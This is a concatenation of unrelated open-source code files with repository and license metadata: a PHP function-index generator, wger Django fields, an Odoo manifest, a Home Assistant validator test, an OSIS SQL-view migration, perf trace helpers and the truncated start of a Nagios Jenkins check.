'ssh2_sftp_readlink',
'ssh2_sftp_realpath',
'ssh2_sftp_rename',
'ssh2_sftp_rmdir',
'ssh2_sftp_stat',
'ssh2_sftp_symlink',
'ssh2_sftp_unlink',
'ssh2_sftp',
'ssh2_shell',
'ssh2_tunnel'],
'SVN': ['svn_add',
'svn_auth_get_parameter',
'svn_auth_set_parameter',
'svn_blame',
'svn_cat',
'svn_checkout',
'svn_cleanup',
'svn_client_version',
'svn_commit',
'svn_delete',
'svn_diff',
'svn_export',
'svn_fs_abort_txn',
'svn_fs_apply_text',
'svn_fs_begin_txn2',
'svn_fs_change_node_prop',
'svn_fs_check_path',
'svn_fs_contents_changed',
'svn_fs_copy',
'svn_fs_delete',
'svn_fs_dir_entries',
'svn_fs_file_contents',
'svn_fs_file_length',
'svn_fs_is_dir',
'svn_fs_is_file',
'svn_fs_make_dir',
'svn_fs_make_file',
'svn_fs_node_created_rev',
'svn_fs_node_prop',
'svn_fs_props_changed',
'svn_fs_revision_prop',
'svn_fs_revision_root',
'svn_fs_txn_root',
'svn_fs_youngest_rev',
'svn_import',
'svn_log',
'svn_ls',
'svn_mkdir',
'svn_repos_create',
'svn_repos_fs_begin_txn_for_commit',
'svn_repos_fs_commit_txn',
'svn_repos_fs',
'svn_repos_hotcopy',
'svn_repos_open',
'svn_repos_recover',
'svn_revert',
'svn_status',
'svn_update'],
'SWF': ['swf_actiongeturl',
'swf_actiongotoframe',
'swf_actiongotolabel',
'swf_actionnextframe',
'swf_actionplay',
'swf_actionprevframe',
'swf_actionsettarget',
'swf_actionstop',
'swf_actiontogglequality',
'swf_actionwaitforframe',
'swf_addbuttonrecord',
'swf_addcolor',
'swf_closefile',
'swf_definebitmap',
'swf_definefont',
'swf_defineline',
'swf_definepoly',
'swf_definerect',
'swf_definetext',
'swf_endbutton',
'swf_enddoaction',
'swf_endshape',
'swf_endsymbol',
'swf_fontsize',
'swf_fontslant',
'swf_fonttracking',
'swf_getbitmapinfo',
'swf_getfontinfo',
'swf_getframe',
'swf_labelframe',
'swf_lookat',
'swf_modifyobject',
'swf_mulcolor',
'swf_nextid',
'swf_oncondition',
'swf_openfile',
'swf_ortho2',
'swf_ortho',
'swf_perspective',
'swf_placeobject',
'swf_polarview',
'swf_popmatrix',
'swf_posround',
'swf_pushmatrix',
'swf_removeobject',
'swf_rotate',
'swf_scale',
'swf_setfont',
'swf_setframe',
'swf_shapearc',
'swf_shapecurveto3',
'swf_shapecurveto',
'swf_shapefillbitmapclip',
'swf_shapefillbitmaptile',
'swf_shapefilloff',
'swf_shapefillsolid',
'swf_shapelinesolid',
'swf_shapelineto',
'swf_shapemoveto',
'swf_showframe',
'swf_startbutton',
'swf_startdoaction',
'swf_startshape',
'swf_startsymbol',
'swf_textwidth',
'swf_translate',
'swf_viewport'],
'Semaphore': ['ftok',
'msg_get_queue',
'msg_queue_exists',
'msg_receive',
'msg_remove_queue',
'msg_send',
'msg_set_queue',
'msg_stat_queue',
'sem_acquire',
'sem_get',
'sem_release',
'sem_remove',
'shm_attach',
'shm_detach',
'shm_get_var',
'shm_has_var',
'shm_put_var',
'shm_remove_var',
'shm_remove'],
'Session': ['session_cache_expire',
'session_cache_limiter',
'session_commit',
'session_decode',
'session_destroy',
'session_encode',
'session_get_cookie_params',
'session_id',
'session_is_registered',
'session_module_name',
'session_name',
'session_regenerate_id',
'session_register',
'session_save_path',
'session_set_cookie_params',
'session_set_save_handler',
'session_start',
'session_unregister',
'session_unset',
'session_write_close'],
'Session PgSQL': ['session_pgsql_add_error',
'session_pgsql_get_error',
'session_pgsql_get_field',
'session_pgsql_reset',
'session_pgsql_set_field',
'session_pgsql_status'],
'Shared Memory': ['shmop_close',
'shmop_delete',
'shmop_open',
'shmop_read',
'shmop_size',
'shmop_write'],
'SimpleXML': ['simplexml_import_dom',
'simplexml_load_file',
'simplexml_load_string'],
'Socket': ['socket_accept',
'socket_bind',
'socket_clear_error',
'socket_close',
'socket_connect',
'socket_create_listen',
'socket_create_pair',
'socket_create',
'socket_get_option',
'socket_getpeername',
'socket_getsockname',
'socket_last_error',
'socket_listen',
'socket_read',
'socket_recv',
'socket_recvfrom',
'socket_select',
'socket_send',
'socket_sendto',
'socket_set_block',
'socket_set_nonblock',
'socket_set_option',
'socket_shutdown',
'socket_strerror',
'socket_write'],
'Solr': ['solr_get_version'],
'Statistic': ['stats_absolute_deviation',
'stats_cdf_beta',
'stats_cdf_binomial',
'stats_cdf_cauchy',
'stats_cdf_chisquare',
'stats_cdf_exponential',
'stats_cdf_f',
'stats_cdf_gamma',
'stats_cdf_laplace',
'stats_cdf_logistic',
'stats_cdf_negative_binomial',
'stats_cdf_noncentral_chisquare',
'stats_cdf_noncentral_f',
'stats_cdf_poisson',
'stats_cdf_t',
'stats_cdf_uniform',
'stats_cdf_weibull',
'stats_covariance',
'stats_den_uniform',
'stats_dens_beta',
'stats_dens_cauchy',
'stats_dens_chisquare',
'stats_dens_exponential',
'stats_dens_f',
'stats_dens_gamma',
'stats_dens_laplace',
'stats_dens_logistic',
'stats_dens_negative_binomial',
'stats_dens_normal',
'stats_dens_pmf_binomial',
'stats_dens_pmf_hypergeometric',
'stats_dens_pmf_poisson',
'stats_dens_t',
'stats_dens_weibull',
'stats_harmonic_mean',
'stats_kurtosis',
'stats_rand_gen_beta',
'stats_rand_gen_chisquare',
'stats_rand_gen_exponential',
'stats_rand_gen_f',
'stats_rand_gen_funiform',
'stats_rand_gen_gamma',
'stats_rand_gen_ibinomial_negative',
'stats_rand_gen_ibinomial',
'stats_rand_gen_int',
'stats_rand_gen_ipoisson',
'stats_rand_gen_iuniform',
'stats_rand_gen_noncenral_chisquare',
'stats_rand_gen_noncentral_f',
'stats_rand_gen_noncentral_t',
'stats_rand_gen_normal',
'stats_rand_gen_t',
'stats_rand_get_seeds',
'stats_rand_phrase_to_seeds',
'stats_rand_ranf',
'stats_rand_setall',
'stats_skew',
'stats_standard_deviation',
'stats_stat_binomial_coef',
'stats_stat_correlation',
'stats_stat_gennch',
'stats_stat_independent_t',
'stats_stat_innerproduct',
'stats_stat_noncentral_t',
'stats_stat_paired_t',
'stats_stat_percentile',
'stats_stat_powersum',
'stats_variance'],
'Stomp': ['stomp_connect_error', 'stomp_version'],
'Stream': ['set_socket_blocking',
'stream_bucket_append',
'stream_bucket_make_writeable',
'stream_bucket_new',
'stream_bucket_prepend',
'stream_context_create',
'stream_context_get_default',
'stream_context_get_options',
'stream_context_get_params',
'stream_context_set_default',
'stream_context_set_option',
'stream_context_set_params',
'stream_copy_to_stream',
'stream_encoding',
'stream_filter_append',
'stream_filter_prepend',
'stream_filter_register',
'stream_filter_remove',
'stream_get_contents',
'stream_get_filters',
'stream_get_line',
'stream_get_meta_data',
'stream_get_transports',
'stream_get_wrappers',
'stream_is_local',
'stream_notification_callback',
'stream_register_wrapper',
'stream_resolve_include_path',
'stream_select'],
'String': ['addcslashes',
'addslashes',
'bin2hex',
'chop',
'chr',
'chunk_split',
'convert_cyr_string',
'convert_uudecode',
'convert_uuencode',
'count_chars',
'crc32',
'crypt',
'echo',
'explode',
'fprintf',
'get_html_translation_table',
'hebrev',
'hebrevc',
'html_entity_decode',
'htmlentities',
'htmlspecialchars_decode',
'htmlspecialchars',
'implode',
'join',
'lcfirst',
'levenshtein',
'localeconv',
'ltrim',
'md5_file',
'md5',
'metaphone',
'money_format',
'nl_langinfo',
'nl2br',
'number_format',
'ord',
'parse_str',
'print',
'printf',
'quoted_printable_decode',
'quoted_printable_encode',
'quotemeta',
'rtrim',
'setlocale',
'sha1_file',
'sha1',
'similar_text',
'soundex',
'sprintf',
'sscanf',
'str_getcsv',
'str_ireplace',
'str_pad',
'str_repeat',
'str_replace',
'str_rot13',
'str_shuffle',
'str_split',
'str_word_count',
'strcasecmp',
'strchr',
'strcmp',
'strcoll',
'strcspn',
'strip_tags',
'stripcslashes',
'stripos',
'stripslashes',
'stristr',
'strlen',
'strnatcasecmp',
'strnatcmp',
'strncasecmp',
'strncmp',
'strpbrk',
'strpos',
'strrchr',
'strrev',
'strripos',
'strrpos',
'strspn'],
'Sybase': ['sybase_affected_rows',
'sybase_close',
'sybase_connect',
'sybase_data_seek',
'sybase_deadlock_retry_count',
'sybase_fetch_array',
'sybase_fetch_assoc',
'sybase_fetch_field',
'sybase_fetch_object',
'sybase_fetch_row',
'sybase_field_seek',
'sybase_free_result',
'sybase_get_last_message',
'sybase_min_client_severity',
'sybase_min_error_severity',
'sybase_min_message_severity',
'sybase_min_server_severity',
'sybase_num_fields',
'sybase_num_rows',
'sybase_pconnect',
'sybase_query',
'sybase_result',
'sybase_select_db',
'sybase_set_message_handler',
'sybase_unbuffered_query'],
'TCP': ['tcpwrap_check'],
'Tidy': ['ob_tidyhandler',
'tidy_access_count',
'tidy_config_count',
'tidy_error_count',
'tidy_get_error_buffer',
'tidy_get_output',
'tidy_load_config',
'tidy_reset_config',
'tidy_save_config',
'tidy_set_encoding',
'tidy_setopt',
'tidy_warning_count'],
'Tokenizer': ['token_get_all', 'token_name'],
'URL': ['base64_decode',
'base64_encode',
'get_headers',
'get_meta_tags',
'http_build_query',
'parse_url',
'rawurldecode',
'rawurlencode',
'urldecode',
'urlencode'],
'Variable handling': ['debug_zval_dump',
'doubleval',
'empty',
'floatval',
'get_defined_vars',
'get_resource_type',
'gettype',
'import_request_variables',
'intval',
'is_array',
'is_bool',
'is_callable',
'is_double',
'is_float',
'is_int',
'is_integer',
'is_long',
'is_null',
'is_numeric',
'is_object',
'is_real',
'is_resource',
'is_scalar',
'is_string',
'isset',
'print_r',
'serialize',
'settype',
'strval',
'unserialize',
'unset',
'var_dump',
'var_export'],
'W32api': ['w32api_deftype',
'w32api_init_dtype',
'w32api_invoke_function',
'w32api_register_function',
'w32api_set_call_method'],
'WDDX': ['wddx_add_vars',
'wddx_deserialize',
'wddx_packet_end',
'wddx_packet_start',
'wddx_serialize_value',
'wddx_serialize_vars',
'wddx_unserialize'],
'WinCache': ['wincache_fcache_fileinfo',
'wincache_fcache_meminfo',
'wincache_lock',
'wincache_ocache_fileinfo',
'wincache_ocache_meminfo',
'wincache_refresh_if_changed',
'wincache_rplist_fileinfo',
'wincache_rplist_meminfo',
'wincache_scache_info',
'wincache_scache_meminfo',
'wincache_ucache_add',
'wincache_ucache_cas',
'wincache_ucache_clear',
'wincache_ucache_dec',
'wincache_ucache_delete',
'wincache_ucache_exists',
'wincache_ucache_get',
'wincache_ucache_inc',
'wincache_ucache_info',
'wincache_ucache_meminfo',
'wincache_ucache_set',
'wincache_unlock'],
'XML Parser': ['utf8_decode'],
'XML-RPC': ['xmlrpc_decode_request',
'xmlrpc_decode',
'xmlrpc_encode_request',
'xmlrpc_encode',
'xmlrpc_get_type',
'xmlrpc_is_fault',
'xmlrpc_parse_method_descriptions',
'xmlrpc_server_add_introspection_data',
'xmlrpc_server_call_method',
'xmlrpc_server_create',
'xmlrpc_server_destroy',
'xmlrpc_server_register_introspection_callback',
'xmlrpc_server_register_method',
'xmlrpc_set_type'],
'XSLT (PHP4)': ['xslt_backend_info',
'xslt_backend_name',
'xslt_backend_version',
'xslt_create',
'xslt_errno',
'xslt_error',
'xslt_free',
'xslt_getopt',
'xslt_process',
'xslt_set_base',
'xslt_set_encoding',
'xslt_set_error_handler',
'xslt_set_log',
'xslt_set_object',
'xslt_set_sax_handler',
'xslt_set_sax_handlers',
'xslt_set_scheme_handler',
'xslt_set_scheme_handlers',
'xslt_setopt'],
'YAZ': ['yaz_addinfo',
'yaz_ccl_conf',
'yaz_ccl_parse',
'yaz_close',
'yaz_connect',
'yaz_database',
'yaz_element',
'yaz_errno',
'yaz_error',
'yaz_es_result',
'yaz_es',
'yaz_get_option',
'yaz_hits',
'yaz_itemorder',
'yaz_present',
'yaz_range',
'yaz_record',
'yaz_scan_result',
'yaz_scan',
'yaz_schema',
'yaz_search',
'yaz_set_option',
'yaz_sort',
'yaz_syntax',
'yaz_wait'],
'YP/NIS': ['yp_all',
'yp_cat',
'yp_err_string',
'yp_errno',
'yp_first',
'yp_get_default_domain',
'yp_master',
'yp_match',
'yp_next',
'yp_order'],
'Yaml': ['yaml_emit_file',
'yaml_emit',
'yaml_parse_file',
'yaml_parse_url',
'yaml_parse'],
'Zip': ['zip_close',
'zip_entry_close',
'zip_entry_compressedsize',
'zip_entry_compressionmethod',
'zip_entry_filesize',
'zip_entry_name',
'zip_entry_open',
'zip_entry_read',
'zip_open',
'zip_read'],
'Zlib': ['gzclose',
'gzcompress',
'gzdecode',
'gzdeflate',
'gzencode',
'gzeof',
'gzfile',
'gzgetc',
'gzgets',
'gzgetss',
'gzinflate',
'gzopen',
'gzpassthru',
'gzputs',
'gzread',
'gzrewind',
'gzseek',
'gztell',
'gzuncompress',
'gzwrite',
'readgzfile',
'zlib_get_coding_type'],
'bcompiler': ['bcompiler_load_exe',
'bcompiler_load',
'bcompiler_parse_class',
'bcompiler_read',
'bcompiler_write_class',
'bcompiler_write_constant',
'bcompiler_write_exe_footer',
'bcompiler_write_file',
'bcompiler_write_footer',
'bcompiler_write_function',
'bcompiler_write_functions_from_file',
'bcompiler_write_header',
'bcompiler_write_included_filename'],
'cURL': ['curl_close',
'curl_copy_handle',
'curl_errno',
'curl_error',
'curl_exec',
'curl_getinfo',
'curl_init',
'curl_multi_add_handle',
'curl_multi_close',
'curl_multi_exec',
'curl_multi_getcontent',
'curl_multi_info_read',
'curl_multi_init',
'curl_multi_remove_handle',
'curl_multi_select',
'curl_setopt_array',
'curl_setopt',
'curl_version'],
'chdb': ['chdb_create'],
'dBase': ['dbase_add_record',
'dbase_close',
'dbase_create',
'dbase_delete_record',
'dbase_get_header_info',
'dbase_get_record_with_names',
'dbase_get_record',
'dbase_numfields',
'dbase_numrecords',
'dbase_open',
'dbase_pack',
'dbase_replace_record'],
'dbx': ['dbx_close',
'dbx_compare',
'dbx_connect',
'dbx_error',
'dbx_escape_string',
'dbx_fetch_row'],
'filePro': ['filepro_fieldcount',
'filepro_fieldname',
'filepro_fieldtype',
'filepro_fieldwidth',
'filepro_retrieve',
'filepro_rowcount',
'filepro'],
'iconv': ['iconv_get_encoding',
'iconv_mime_decode_headers',
'iconv_mime_decode',
'iconv_mime_encode',
'iconv_set_encoding',
'iconv_strlen',
'iconv_strpos',
'iconv_strrpos',
'iconv_substr',
'iconv',
'ob_iconv_handler'],
'inclued': ['inclued_get_data'],
'intl': ['intl_error_name',
'intl_get_error_code',
'intl_get_error_message',
'intl_is_failure'],
'libxml': ['libxml_clear_errors',
'libxml_disable_entity_loader',
'libxml_get_errors',
'libxml_get_last_error',
'libxml_set_streams_context',
'libxml_use_internal_errors'],
'mSQL': ['msql_affected_rows',
'msql_close',
'msql_connect',
'msql_create_db',
'msql_createdb',
'msql_data_seek',
'msql_db_query',
'msql_dbname',
'msql_drop_db',
'msql_error',
'msql_fetch_array',
'msql_fetch_field',
'msql_fetch_object',
'msql_fetch_row',
'msql_field_flags',
'msql_field_len',
'msql_field_name',
'msql_field_seek',
'msql_field_table',
'msql_field_type',
'msql_fieldflags',
'msql_fieldlen',
'msql_fieldname',
'msql_fieldtable',
'msql_fieldtype',
'msql_free_result',
'msql_list_dbs',
'msql_list_fields',
'msql_list_tables',
'msql_num_fields',
'msql_num_rows',
'msql_numfields',
'msql_numrows',
'msql_pconnect',
'msql_query',
'msql_regcase',
'msql_result',
'msql_select_db',
'msql_tablename',
'msql'],
'mnoGoSearch': ['udm_add_search_limit',
'udm_alloc_agent_array',
'udm_alloc_agent',
'udm_api_version',
'udm_cat_list',
'udm_cat_path',
'udm_check_charset',
'udm_check_stored',
'udm_clear_search_limits',
'udm_close_stored',
'udm_crc32',
'udm_errno',
'udm_error',
'udm_find',
'udm_free_agent',
'udm_free_ispell_data',
'udm_free_res',
'udm_get_doc_count',
'udm_get_res_field',
'udm_get_res_param',
'udm_hash32',
'udm_load_ispell_data',
'udm_open_stored',
'udm_set_agent_param'],
'mqseries': ['mqseries_back',
'mqseries_begin',
'mqseries_close',
'mqseries_cmit',
'mqseries_conn',
'mqseries_connx',
'mqseries_disc',
'mqseries_get',
'mqseries_inq',
'mqseries_open',
'mqseries_put1',
'mqseries_put',
'mqseries_set',
'mqseries_strerror'],
'mysqlnd_qc': ['mysqlnd_qc_change_handler',
'mysqlnd_qc_clear_cache',
'mysqlnd_qc_get_cache_info',
'mysqlnd_qc_get_core_stats',
'mysqlnd_qc_get_handler',
'mysqlnd_qc_get_query_trace_log',
'mysqlnd_qc_set_user_handlers'],
'qtdom': ['qdom_error', 'qdom_tree'],
'runkit': ['runkit_class_adopt',
'runkit_class_emancipate',
'runkit_constant_add',
'runkit_constant_redefine',
'runkit_constant_remove',
'runkit_function_add',
'runkit_function_copy',
'runkit_function_redefine',
'runkit_function_remove',
'runkit_function_rename',
'runkit_import',
'runkit_lint_file',
'runkit_lint',
'runkit_method_add',
'runkit_method_copy',
'runkit_method_redefine',
'runkit_method_remove',
'runkit_method_rename',
'runkit_return_value_used',
'runkit_sandbox_output_handler',
'runkit_superglobals'],
'ssdeep': ['ssdeep_fuzzy_compare',
'ssdeep_fuzzy_hash_filename',
'ssdeep_fuzzy_hash'],
'vpopmail': ['vpopmail_add_alias_domain_ex',
'vpopmail_add_alias_domain',
'vpopmail_add_domain_ex',
'vpopmail_add_domain',
'vpopmail_add_user',
'vpopmail_alias_add',
'vpopmail_alias_del_domain',
'vpopmail_alias_del',
'vpopmail_alias_get_all',
'vpopmail_alias_get',
'vpopmail_auth_user',
'vpopmail_del_domain_ex',
'vpopmail_del_domain',
'vpopmail_del_user',
'vpopmail_error',
'vpopmail_passwd',
'vpopmail_set_user_quota'],
'win32ps': ['win32_ps_list_procs', 'win32_ps_stat_mem', 'win32_ps_stat_proc'],
'win32service': ['win32_continue_service',
'win32_create_service',
'win32_delete_service',
'win32_get_last_control_message',
'win32_pause_service',
'win32_query_service_status',
'win32_set_service_status',
'win32_start_service_ctrl_dispatcher',
'win32_start_service',
'win32_stop_service'],
'xattr': ['xattr_get',
'xattr_list',
'xattr_remove',
'xattr_set',
'xattr_supported'],
'xdiff': ['xdiff_file_bdiff_size',
'xdiff_file_bdiff',
'xdiff_file_bpatch',
'xdiff_file_diff_binary',
'xdiff_file_diff',
'xdiff_file_merge3',
'xdiff_file_patch_binary',
'xdiff_file_patch',
'xdiff_file_rabdiff',
'xdiff_string_bdiff_size',
'xdiff_string_bdiff',
'xdiff_string_bpatch',
'xdiff_string_diff_binary',
'xdiff_string_diff',
'xdiff_string_merge3',
'xdiff_string_patch_binary',
'xdiff_string_patch',
'xdiff_string_rabdiff']}
if __name__ == '__main__':
import glob
import os
import pprint
import re
import shutil
import tarfile
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
PHP_MANUAL_URL = 'http://us3.php.net/distributions/manual/php_manual_en.tar.gz'
PHP_MANUAL_DIR = './php-chunked-xhtml/'
PHP_REFERENCE_GLOB = 'ref.*'
PHP_FUNCTION_RE = r'<a href="function\..*?\.html">(.*?)</a>'
PHP_MODULE_RE = '<title>(.*?) Functions</title>'
def get_php_functions():
function_re = re.compile(PHP_FUNCTION_RE)
module_re = re.compile(PHP_MODULE_RE)
modules = {}
for file in get_php_references():
module = ''
for line in open(file):
if not module:
search = module_re.search(line)
if search:
module = search.group(1)
modules[module] = []
elif '<h2>Table of Contents</h2>' in line:
for match in function_re.finditer(line):
fn = match.group(1)
if '->' not in fn and '::' not in fn:
modules[module].append(fn)
# These are dummy manual pages, not actual functions
if module == 'PHP Options/Info':
modules[module].remove('main')
elif module == 'Filesystem':
modules[module].remove('delete')
if not modules[module]:
del modules[module]
break
return modules
def get_php_references():
download = urlretrieve(PHP_MANUAL_URL)
tar = tarfile.open(download[0])
tar.extractall()
tar.close()
for file in glob.glob("%s%s" % (PHP_MANUAL_DIR, PHP_REFERENCE_GLOB)):
yield file
os.remove(download[0])
def regenerate(filename, modules):
f = open(filename)
try:
content = f.read()
finally:
f.close()
header = content[:content.find('MODULES = {')]
footer = content[content.find("if __name__ == '__main__':"):]
f = open(filename, 'w')
f.write(header)
f.write('MODULES = %s\n\n' % pprint.pformat(modules))
f.write(footer)
f.close()
def run():
print('>> Downloading Function Index')
modules = get_php_functions()
total = sum(len(v) for v in modules.values())
print('%d functions found' % total)
regenerate(__file__, modules)
shutil.rmtree(PHP_MANUAL_DIR)
run()
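# Running this module directly regenerates the MODULES dict above: it
# downloads the PHP manual tarball, scans the extracted ref.* pages for
# function names, rewrites MODULES in place via regenerate(__file__, ...),
# and finally removes the extracted manual directory.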
|
bsd-2-clause
|
petervanderdoes/wger
|
wger/utils/fields.py
|
1
|
1559
|
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Standard Library
import logging
# Third Party
from django.db import models
# wger
from wger.utils.widgets import (
Html5FormDateField,
Html5FormTimeField
)
logger = logging.getLogger(__name__)
class Html5TimeField(models.TimeField):
'''
Custom Time field that uses the Html5TimeInput widget
'''
def formfield(self, **kwargs):
'''
Use our custom field
'''
defaults = {'form_class': Html5FormTimeField}
defaults.update(kwargs)
return super(Html5TimeField, self).formfield(**defaults)
class Html5DateField(models.DateField):
'''
Custom Date field that uses the Html5DateInput widget
'''
def formfield(self, **kwargs):
'''
Use our custom field
'''
defaults = {'form_class': Html5FormDateField}
defaults.update(kwargs)
return super(Html5DateField, self).formfield(**defaults)
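# A minimal usage sketch (hypothetical model, not part of wger itself): at
# the ORM level both fields behave like Django's DateField/TimeField and
# only swap in the HTML5 form fields when a ModelForm is rendered.
#
# from django.db import models
# from wger.utils.fields import Html5DateField, Html5TimeField
#
# class Appointment(models.Model):
#     day = Html5DateField()
#     start = Html5TimeField()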
|
agpl-3.0
|
PongPi/isl-odoo
|
addons/note_pad/__openerp__.py
|
312
|
1691
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Memos pad',
'version': '0.1',
'category': 'Tools',
'description': """
This module updates memos inside OpenERP to use an external pad
===============================================================
Use it to edit your text memos in real time together with the users you invite.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/notes',
'summary': 'Sticky memos, Collaborative',
'depends': [
'mail',
'pad',
'note',
],
'data': [
'note_pad_view.xml',
],
'installable': True,
'application': False,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
Teagan42/home-assistant
|
tests/components/http/test_data_validator.py
|
7
|
1929
|
"""Test data validator decorator."""
from unittest.mock import Mock
from aiohttp import web
import voluptuous as vol
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.http.data_validator import RequestDataValidator
async def get_client(aiohttp_client, validator):
"""Generate a client that hits a view decorated with validator."""
app = web.Application()
app["hass"] = Mock(is_running=True)
class TestView(HomeAssistantView):
url = "/"
name = "test"
requires_auth = False
@validator
async def post(self, request, data):
"""Test method."""
return b""
TestView().register(app, app.router)
client = await aiohttp_client(app)
return client
async def test_validator(aiohttp_client):
"""Test the validator."""
client = await get_client(
aiohttp_client, RequestDataValidator(vol.Schema({vol.Required("test"): str}))
)
resp = await client.post("/", json={"test": "bla"})
assert resp.status == 200
resp = await client.post("/", json={"test": 100})
assert resp.status == 400
resp = await client.post("/")
assert resp.status == 400
async def test_validator_allow_empty(aiohttp_client):
"""Test the validator with empty data."""
client = await get_client(
aiohttp_client,
RequestDataValidator(
vol.Schema(
{
# Although we allow empty, our schema should still be able
# to validate an empty dict.
vol.Optional("test"): str
}
),
allow_empty=True,
),
)
resp = await client.post("/", json={"test": "bla"})
assert resp.status == 200
resp = await client.post("/", json={"test": 100})
assert resp.status == 400
resp = await client.post("/")
assert resp.status == 200
|
apache-2.0
|
uclouvain/osis
|
base/migrations/0054_scoresencoding.py
|
1
|
2269
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-05-02 15:06
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('base', '0053_auto_20160529_2355'),
]
operations = [
migrations.RunSQL(
"""
DROP VIEW IF EXISTS app_scores_encoding;
CREATE OR REPLACE VIEW app_scores_encoding AS
SELECT row_number() OVER () as id,
base_programmanager.id as program_manager_id,
program_manager_person.id as pgm_manager_person_id,
base_offeryear.id as offer_year_id,
base_learningunityear.id as learning_unit_year_id,
count(base_examenrollment.id) as total_exam_enrollments,
sum(case when base_examenrollment.score_final is not null or base_examenrollment.justification_final is not null then 1 else 0 end) exam_enrollments_encoded
from base_examenrollment
join base_sessionexam on base_sessionexam.id = base_examenrollment.session_exam_id
join base_learningunityear on base_learningunityear.id = base_sessionexam.learning_unit_year_id
join base_offeryearcalendar on base_offeryearcalendar.id = base_sessionexam.offer_year_calendar_id
join base_learningunitenrollment on base_learningunitenrollment.id = base_examenrollment.learning_unit_enrollment_id
join base_offerenrollment on base_offerenrollment.id = base_learningunitenrollment.offer_enrollment_id
join base_offeryear on base_offeryear.id = base_offerenrollment.offer_year_id
join base_programmanager on base_programmanager.offer_year_id = base_offeryear.id
join base_person program_manager_person on program_manager_person.id = base_programmanager.person_id
where base_offeryearcalendar.start_date <= CURRENT_TIMESTAMP::date
and base_offeryearcalendar.end_date >= CURRENT_TIMESTAMP::date
group by
base_programmanager.id,
program_manager_person.id,
base_offeryear.id,
base_learningunityear.id
;
""",
elidable=True
),
]
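# Illustrative query against the view created above (column names taken
# from its SELECT list), e.g. to inspect encoding progress per programme:
#
#   SELECT program_manager_id, offer_year_id,
#          exam_enrollments_encoded, total_exam_enrollments
#   FROM app_scores_encoding;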
|
agpl-3.0
|
fermasia/android_kernel_oneplus_msm8974
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py
|
11088
|
3246
|
# Core.py - Python extension for perf script, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
return defaultdict(autodict)
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
# nothing to do, really
pass
def define_symbolic_value(event_name, field_name, value, field_str):
symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
string = ""
if flag_fields[event_name][field_name]:
print_delim = 0
keys = sorted(flag_fields[event_name][field_name]['values'].keys())
for idx in keys:
if not value and not idx:
string += flag_fields[event_name][field_name]['values'][idx]
break
if idx and (value & idx) == idx:
if print_delim and flag_fields[event_name][field_name]['delim']:
string += " " + flag_fields[event_name][field_name]['delim'] + " "
string += flag_fields[event_name][field_name]['values'][idx]
print_delim = 1
value &= ~idx
return string
def symbol_str(event_name, field_name, value):
string = ""
if symbolic_fields[event_name][field_name]:
keys = sorted(symbolic_fields[event_name][field_name]['values'].keys())
for idx in keys:
if not value and not idx:
string = symbolic_fields[event_name][field_name]['values'][idx]
break
if (value == idx):
string = symbolic_fields[event_name][field_name]['values'][idx]
break
return string
trace_flags = { 0x00: "NONE", \
0x01: "IRQS_OFF", \
0x02: "IRQS_NOSUPPORT", \
0x04: "NEED_RESCHED", \
0x08: "HARDIRQ", \
0x10: "SOFTIRQ" }
def trace_flag_str(value):
string = ""
print_delim = 0
keys = sorted(trace_flags.keys())
for idx in keys:
if not value and not idx:
string += "NONE"
break
if idx and (value & idx) == idx:
if print_delim:
string += " | "
string += trace_flags[idx]
print_delim = 1
value &= ~idx
return string
def taskState(state):
states = {
0 : "R",
1 : "S",
2 : "D",
64: "DEAD"
}
if state not in states:
return "Unknown"
return states[state]
class EventHeaders:
def __init__(self, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
self.cpu = common_cpu
self.secs = common_secs
self.nsecs = common_nsecs
self.pid = common_pid
self.comm = common_comm
def ts(self):
return (self.secs * (10 ** 9)) + self.nsecs
def ts_format(self):
return "%d.%d" % (self.secs, int(self.nsecs / 1000))
|
gpl-2.0
|
openstack/third-party-ci-tools
|
monitoring/nagios/checks/check_jenkins.py
|
4
|
1519
|
#!/usr/bin/env python
import argparse
import ast
import urllib
import utils
def check_jenkins_status(job_name, warning_threshold, critical_threshold):
"""Returns a tuple of exit code and message string
Exit codes are either 2 -> critical, 1 -> warning, or 0 -> OK
The exit code is determined based on the job health score and the thresholds
passed into the script.
"""
try:
target_url = 'http://localhost:8080/job/%s/api/python' % job_name
# the /api/python endpoint returns a Python literal; parse it
# safely with ast.literal_eval rather than eval()
jenkins_volume_job = ast.literal_eval(urllib.urlopen(target_url).read())
if jenkins_volume_job:
health_score = jenkins_volume_job['healthReport'][0]['score']
